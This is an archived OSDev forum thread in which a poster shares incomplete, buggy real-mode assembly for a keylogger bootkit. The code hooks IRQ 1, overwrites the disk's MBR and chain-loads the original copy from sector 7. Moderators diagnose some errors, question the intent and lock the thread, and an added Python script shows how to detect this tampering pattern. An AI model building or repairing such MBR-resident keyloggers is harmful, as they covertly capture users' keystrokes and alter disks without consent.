OSDev.org
https://forum.osdev.org/

hook irq1 installed at MBR
https://forum.osdev.org/viewtopic.php?f=13&t=32709
Page 1 of 1

Author:  Apolo [ Wed Jan 24, 2018 7:46 am ]
Post subject:  hook irq1 installed at MBR

I am coding a program that hooks IRQ 1 and is installed onto the MBR, and restores the original MBR that is saved at sector 7; however, the OS doesn't bootstrap. Here is my code:

Code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov      si,3100h
mov      al,10h
mov      [si],al
mov      al,0
mov      [si+1],al
mov      al,01
mov      [si+2],al
mov           al,0
mov      [si+3],al
MOV      AX,7C00H
mov      [si+4],ax
mov      ax,0h
mov      [si+6],ax
mov      ax,7
mov      [si+8],ax
xor      ax,ax
mov      [si+0ah],ax
mov      [si+0ch],ax
mov      [si+0eh],ax

mov      ah,42h
mov      dl,80h
INT      13H


JMP           0:7C00H



Where is my code above wrong???

Author:  iansjack [ Wed Jan 24, 2018 10:20 am ]
Post subject:  Re: hook irq1 installed at MBR

You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first.

Author:  AJ [ Wed Jan 24, 2018 10:44 am ]
Post subject:  Re: hook irq1 installed at MBR

Hi,

In addition to iansjack's post, we have absolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive)?

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam

Author:  Apolo [ Wed Jan 24, 2018 11:22 am ]
Post subject:  Re: hook irq1 installed at MBR

My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?

Author:  iansjack [ Wed Jan 24, 2018 11:30 am ]
Post subject:  Re: hook irq1 installed at MBR

I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.

Author:  Brendan [ Wed Jan 24, 2018 9:58 pm ]
Post subject:  Re: hook irq1 installed at MBR

Hi,

Apolo wrote:
My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?


To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assembler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulfil the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan

Author:  AJ [ Thu Jan 25, 2018 5:19 am ]
Post subject:  Re: hook irq1 installed at MBR

That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT, and chances are your code will end up in an unmapped memory page anyway.

You'd generally be better off with a hardware key logger, but what you are doing may be at best immoral and at worst illegal!

Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.

Cheers,
Adam
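From the defender's side, the pattern this thread describes (sector 0 rewritten with hook code, the original MBR stashed in a later sector and chain-loaded from there) is exactly what a disk-integrity check looks for. The following Python script is an added example, not code from the thread or from any poster: it builds a constructed 16-sector disk image in memory, compares sector 0 against a trusted baseline copy of the MBR, and scans the following sectors for a relocated copy of that baseline. The function names (audit_mbr, find_relocated_mbr, build_sample_images), the sample byte patterns and the image layout are assumptions made for illustration; note that the thread's "sector 7" is a 1-based CHS sector number, which is LBA 6 in the 0-based numbering used here.

```python
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xAA"          # little-endian 0xAA55 at offset 510


def read_sector(image: bytes, lba: int) -> bytes:
    """Return the 512-byte sector at 0-based LBA `lba` from a raw image."""
    return image[lba * SECTOR:(lba + 1) * SECTOR]


def has_boot_signature(sector: bytes) -> bool:
    """True if the sector ends with the 0xAA55 boot signature."""
    return len(sector) == SECTOR and sector[510:512] == BOOT_SIG


def partition_table(sector: bytes) -> bytes:
    """The 64-byte classic MBR partition table (offsets 446..509)."""
    return sector[446:510]


def find_relocated_mbr(image: bytes, baseline_mbr: bytes, max_lba: int = 64) -> list:
    """LBAs (other than 0) whose content is an exact copy of the baseline MBR.

    A bootkit that overwrites sector 0 usually parks the original MBR
    nearby so it can chain-load it; an exact copy of the trusted MBR
    sitting in a non-zero sector is therefore a strong tamper indicator.
    """
    last = min(max_lba, len(image) // SECTOR)
    return [lba for lba in range(1, last) if read_sector(image, lba) == baseline_mbr]


def audit_mbr(image: bytes, baseline_mbr: bytes) -> list:
    """Compare sector 0 of `image` with a trusted baseline; return findings."""
    mbr = read_sector(image, 0)
    findings = []
    if not has_boot_signature(mbr):
        findings.append("missing 0xAA55 boot signature in sector 0")
    if mbr[:446] != baseline_mbr[:446]:
        findings.append("boot code in sector 0 differs from baseline")
    if partition_table(mbr) != partition_table(baseline_mbr):
        findings.append("partition table in sector 0 differs from baseline")
    for lba in find_relocated_mbr(image, baseline_mbr):
        findings.append(f"exact copy of baseline MBR found at LBA {lba} (chain-load pattern)")
    return findings


def build_sample_images():
    """Constructed sample data (not from a real disk): baseline MBR, a clean
    16-sector image, and a tampered image in the layout the thread describes."""
    # 446 bytes of filler boot code: a few real-mode setup opcodes, then NOPs.
    code = b"\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C" + b"\x90" * 438
    # One bootable Linux partition entry starting at LBA 2048, 204800 sectors.
    entry = bytes([0x80, 0x01, 0x01, 0x00, 0x83, 0xFE, 0xFF, 0xFF]) + struct.pack("<II", 2048, 204800)
    ptable = entry + b"\x00" * 48
    baseline = code + ptable + BOOT_SIG
    assert len(baseline) == SECTOR

    clean = baseline + b"\x00" * (SECTOR * 15)

    # Tampered layout: sector 0 boot code replaced (partition table and
    # signature kept so the BIOS still boots it), original MBR copied to
    # CHS sector 7 = LBA 6.
    hook_code = b"\xEB\xFE" + b"\xCC" * 444
    tampered = bytearray(clean)
    tampered[0:SECTOR] = hook_code + ptable + BOOT_SIG
    tampered[6 * SECTOR:7 * SECTOR] = baseline
    return baseline, clean, bytes(tampered)


if __name__ == "__main__":
    baseline, clean, tampered = build_sample_images()
    print("clean image:", audit_mbr(clean, baseline) or "no findings")
    print("tampered image:", audit_mbr(tampered, baseline))
```

In practice the baseline would be a hash or copy of sector 0 taken when the machine was provisioned (read with `dd if=/dev/sda bs=512 count=1` on Linux or from a raw image), and the scan window would cover the whole gap before the first partition rather than 16 sectors. A preserved partition table with changed boot code is the important case: the disk still boots normally, so the only visible symptom is the difference from the baseline.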

Author:  Apolo [ Fri Jan 26, 2018 4:26 am ]
Post subject:  Re: hook irq1 installed at MBR

I think the BIOS of my PCs is all infected, because I tried this most simple code, but the PCs still don't bootstrap. See my most simple code:

Code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:

Aaaaaaaaa! What is the problem with my code?

Author:  iansjack [ Fri Jan 26, 2018 5:15 am ]
Post subject:  Re: hook irq1 installed at MBR

The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.

Author:  AJ [ Fri Jan 26, 2018 5:24 am ]
Post subject:  Re: hook irq1 installed at MBR

You have one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam

Author:  Apolo [ Fri Jan 26, 2018 5:31 am ]
Post subject:  Re: hook irq1 installed at MBR

Summary:

I am trying to bootstrap from sector 7, which is where the original MBR is written. Can someone help me?? I am desperate!

Author:  AJ [ Fri Jan 26, 2018 6:02 am ]
Post subject:  Re: hook irq1 installed at MBR

Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...
